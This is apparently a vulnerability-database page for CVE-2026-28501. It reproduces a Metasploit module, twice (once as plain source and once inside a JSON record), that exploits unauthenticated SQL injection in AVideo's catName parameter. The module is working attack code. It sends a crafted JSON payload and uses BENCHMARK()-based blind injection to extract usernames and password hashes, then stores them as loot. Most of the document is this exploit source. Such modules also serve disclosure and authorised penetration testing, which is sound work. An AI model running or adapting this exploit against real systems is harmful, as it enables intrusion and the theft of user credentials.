AVideo Unauthenticated SQL Injection Credential Dump_MSF:AUXILIARY-GATHER-AVIDEO_CATNAME_SQLI-

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

AVideo use auxiliary/gather/avideocatnamesqli msf auxiliaryavideocatnamesqli show actions ...actions... msf auxiliaryavideocatnamesqli set ACTION msf auxiliaryavideocatnamesqli show options ...show and set options... msf auxiliaryavideocatnamesqli...

Visit Original Source

Basic Information

ID MSF:AUXILIARY-GATHER-AVIDEO_CATNAME_SQLI-

Published Apr 10, 2026 at 19:02

Affected Product

Affected Versions ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::SQLi
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck

def initialize(info = {})
super(
update_info(
info,
'Name' => 'AVideo Unauthenticated SQL Injection Credential Dump',
'Description' => %q{
AVideo <= 22.0 is vulnerable to unauthenticated SQL injection via the
catName parameter in objects/videos.json.php (CVE-2026-28501).

The security filter in security.php sanitizes GET/POST parameters but
does not cover JSON request bodies. Since videos.json.php parses JSON
input and merges it into $_REQUEST after the filter runs, a catName
value sent as JSON bypasses sanitization entirely and reaches
getCatSQL() unsanitized.

This module uses time-based blind injection with BENCHMARK() to dump
usernames and password hashes. SLEEP() is blocked by the sqlDAL
prepared statement layer, but BENCHMARK(N*(condition), SHA1(x)) works
because the condition is evaluated as a multiplier on the iteration
count, avoiding the subquery restrictions imposed by prepare().

Fixed in 24.0 (no 23.0 release exists).
},
'Author' => [
'arkmarta', # Vulnerability discovery
'Valentin Lobstein <chocapikk[at]leakix.net>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2026-28501'],
['GHSA', 'pv87-r9qf-x56p', 'WWBN/AVideo']
],
'DisclosureDate' => '2026-03-05',
'DefaultOptions' => { 'SqliDelay' => 1 },
'Notes' => {
'Stability' => [CRASH_SAFE],
'SideEffects' => [IOC_IN_LOGS],
'Reliability' => []
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'The base path to AVideo', '/']),
OptInt.new('COUNT', [true, 'Number of users to dump (default: all)', 0])
])
end

def check
res = send_request_cgi('uri' => endpoint_uri, 'method' => 'GET')

return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res
return Exploit::CheckCode::Safe("Unexpected HTTP #{res.code}") unless res.code == 200

json = res.get_json_document
return Exploit::CheckCode::Safe('Response is not valid JSON') if json.empty?
return Exploit::CheckCode::Safe('Response missing expected fields') unless json.key?('total') && json.key?('rows')

setup_sqli

if @setup_sqli.test_vulnerable
return Exploit::CheckCode::Vulnerable('Time-based blind SQLi confirmed via BENCHMARK()')
end

Exploit::CheckCode::Safe('Endpoint accessible but injection did not trigger')
end

def run
setup_sqli

columns = %w[user password]
count = datastore['COUNT']
print_status('Dumping user credentials from the users table...')
print_warning('Time-based blind extraction is slow (~4s per character). Be patient.')
data = @setup_sqli.dump_table_fields('users', columns, '', count)

table = Rex::Text::Table.new(
'Header' => 'AVideo Users',
'Indent' => 4,
'Columns' => columns
)

data.each do |row|
table << row

next if row[1].blank?

create_credential({
workspace_id: myworkspace_id,
origin_type: :service,
module_fullname: fullname,
username: row[0],
private_type: :nonreplayable_hash,
jtr_format: Metasploit::Framework::Hashes.identify_hash(row[1]),
private_data: row[1],
service_name: ssl ? 'https' : 'http',
address: rhost,
port: rport,
protocol: 'tcp',
status: Metasploit::Model::Login::Status::UNTRIED
})
end

print_line(table.to_s)

loot_data = data.map { |row| "#{row[0]}:#{row[1]}" }.join("\n")
loot_path = store_loot('avideo.users', 'text/plain', rhost, loot_data, 'avideo_users.txt', 'AVideo User Credentials')
print_good("Loot saved to: #{loot_path}")

report_host(host: rhost)
report_service(host: rhost, port: rport, proto: 'tcp', name: ssl ? 'https' : 'http')
report_vuln(host: rhost, port: rport, proto: 'tcp', name: fullname, refs: references, info: description.strip)
end

private

def endpoint_uri
normalize_uri(target_uri.path, 'objects', 'videos.json.php')
end

def setup_sqli
@setup_sqli ||= create_sqli(dbms: MySQLi::BenchmarkBasedBlind, opts: { hex_encode_strings: true, safe: true }) do |payload|
body = { 'catName' => "' OR #{payload} AND '1'='1", 'doNotShowCatChilds' => 1 }.to_json

send_request_cgi({
'uri' => endpoint_uri,
'method' => 'POST',
'ctype' => 'application/json',
'data' => body
})
end
end
end

{
    "lastseen": "2026-04-10T21:50:37",
    "description": "AVideo use auxiliary/gather/avideocatnamesqli msf auxiliaryavideocatnamesqli show actions ...actions... msf auxiliaryavideocatnamesqli set ACTION msf auxiliaryavideocatnamesqli show options ...show and set options... msf auxiliaryavideocatnamesqli...",
    "published": "2026-04-10T19:02:52",
    "modified": "2026-04-10T19:02:52",
    "type": "metasploit",
    "title": "AVideo Unauthenticated SQL Injection Credential Dump",
    "source": "",
    "references": "",
    "id": "MSF:AUXILIARY-GATHER-AVIDEO_CATNAME_SQLI-",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2026-28501"
    ],
    "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n  include Msf::Exploit::SQLi\n  include Msf::Auxiliary::Report\n  include Msf::Exploit::Remote::HttpClient\n  prepend Msf::Exploit::Remote::AutoCheck\n\n  def initialize(info = {})\n    super(\n      update_info(\n        info,\n        'Name' => 'AVideo Unauthenticated SQL Injection Credential Dump',\n        'Description' => %q{\n          AVideo <= 22.0 is vulnerable to unauthenticated SQL injection via the\n          catName parameter in objects/videos.json.php (CVE-2026-28501).\n\n          The security filter in security.php sanitizes GET/POST parameters but\n          does not cover JSON request bodies. Since videos.json.php parses JSON\n          input and merges it into $_REQUEST after the filter runs, a catName\n          value sent as JSON bypasses sanitization entirely and reaches\n          getCatSQL() unsanitized.\n\n          This module uses time-based blind injection with BENCHMARK() to dump\n          usernames and password hashes. SLEEP() is blocked by the sqlDAL\n          prepared statement layer, but BENCHMARK(N*(condition), SHA1(x)) works\n          because the condition is evaluated as a multiplier on the iteration\n          count, avoiding the subquery restrictions imposed by prepare().\n\n          Fixed in 24.0 (no 23.0 release exists).\n        },\n        'Author' => [\n          'arkmarta', # Vulnerability discovery\n          'Valentin Lobstein <chocapikk[at]leakix.net>' # Metasploit module\n        ],\n        'License' => MSF_LICENSE,\n        'References' => [\n          ['CVE', '2026-28501'],\n          ['GHSA', 'pv87-r9qf-x56p', 'WWBN/AVideo']\n        ],\n        'DisclosureDate' => '2026-03-05',\n        'DefaultOptions' => { 'SqliDelay' => 1 },\n        'Notes' => {\n          'Stability' => [CRASH_SAFE],\n          'SideEffects' => [IOC_IN_LOGS],\n          'Reliability' => []\n        }\n      )\n    )\n\n    register_options([\n      OptString.new('TARGETURI', [true, 'The base path to AVideo', '/']),\n      OptInt.new('COUNT', [true, 'Number of users to dump (default: all)', 0])\n    ])\n  end\n\n  def check\n    res = send_request_cgi('uri' => endpoint_uri, 'method' => 'GET')\n\n    return Exploit::CheckCode::Unknown('Failed to connect to the target.') unless res\n    return Exploit::CheckCode::Safe(\"Unexpected HTTP #{res.code}\") unless res.code == 200\n\n    json = res.get_json_document\n    return Exploit::CheckCode::Safe('Response is not valid JSON') if json.empty?\n    return Exploit::CheckCode::Safe('Response missing expected fields') unless json.key?('total') && json.key?('rows')\n\n    setup_sqli\n\n    if @setup_sqli.test_vulnerable\n      return Exploit::CheckCode::Vulnerable('Time-based blind SQLi confirmed via BENCHMARK()')\n    end\n\n    Exploit::CheckCode::Safe('Endpoint accessible but injection did not trigger')\n  end\n\n  def run\n    setup_sqli\n\n    columns = %w[user password]\n    count = datastore['COUNT']\n    print_status('Dumping user credentials from the users table...')\n    print_warning('Time-based blind extraction is slow (~4s per character). Be patient.')\n    data = @setup_sqli.dump_table_fields('users', columns, '', count)\n\n    table = Rex::Text::Table.new(\n      'Header' => 'AVideo Users',\n      'Indent' => 4,\n      'Columns' => columns\n    )\n\n    data.each do |row|\n      table << row\n\n      next if row[1].blank?\n\n      create_credential({\n        workspace_id: myworkspace_id,\n        origin_type: :service,\n        module_fullname: fullname,\n        username: row[0],\n        private_type: :nonreplayable_hash,\n        jtr_format: Metasploit::Framework::Hashes.identify_hash(row[1]),\n        private_data: row[1],\n        service_name: ssl ? 'https' : 'http',\n        address: rhost,\n        port: rport,\n        protocol: 'tcp',\n        status: Metasploit::Model::Login::Status::UNTRIED\n      })\n    end\n\n    print_line(table.to_s)\n\n    loot_data = data.map { |row| \"#{row[0]}:#{row[1]}\" }.join(\"\\n\")\n    loot_path = store_loot('avideo.users', 'text/plain', rhost, loot_data, 'avideo_users.txt', 'AVideo User Credentials')\n    print_good(\"Loot saved to: #{loot_path}\")\n\n    report_host(host: rhost)\n    report_service(host: rhost, port: rport, proto: 'tcp', name: ssl ? 'https' : 'http')\n    report_vuln(host: rhost, port: rport, proto: 'tcp', name: fullname, refs: references, info: description.strip)\n  end\n\n  private\n\n  def endpoint_uri\n    normalize_uri(target_uri.path, 'objects', 'videos.json.php')\n  end\n\n  def setup_sqli\n    @setup_sqli ||= create_sqli(dbms: MySQLi::BenchmarkBasedBlind, opts: { hex_encode_strings: true, safe: true }) do |payload|\n      body = { 'catName' => \"' OR #{payload} AND '1'='1\", 'doNotShowCatChilds' => 1 }.to_json\n\n      send_request_cgi({\n        'uri' => endpoint_uri,\n        'method' => 'POST',\n        'ctype' => 'application/json',\n        'data' => body\n      })\n    end\n  end\nend\n",
    "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/avideo_catname_sqli.rb",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.rapid7.com/db/modules/auxiliary/gather/avideo_catname_sqli/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply